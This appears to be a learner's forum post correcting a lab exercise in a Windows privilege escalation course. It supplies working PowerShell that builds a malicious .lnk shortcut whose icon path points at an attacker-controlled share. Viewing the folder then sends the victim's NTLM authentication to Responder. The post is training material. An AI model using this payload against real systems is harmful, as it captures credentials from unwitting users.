In the Windows privilege escalation module, section user interaction:

the example payload for the malicious lnk file works only when using the shortcut by clicking it. In order for it to be triggered when viewed in explorer the iconpath needs to be set to the target ip (otherwise this labs targeted account will not end up at responder) (i had to set the targetpath to something else like calc.exe in order to work, don't know why)

so payload should be:

$objShell = New-Object -ComObject WScript.Shell

$lnk = $objShell.CreateShortcut("C:\legit.lnk")

$lnk.TargetPath = "calc.exe"

$lnk.WindowStyle = 1

$lnk.IconLocation = "\\<attackerIP>\@pwn.png, 0"

$lnk.Description = "Browsing to the directory where this file is saved will trigger an auth request."

$lnk.HotKey = "Ctrl+Alt+O"

$lnk.Save()

Note that this is just for the Windows Server 2016 used in the example. Windows Server 2019 seems do work different.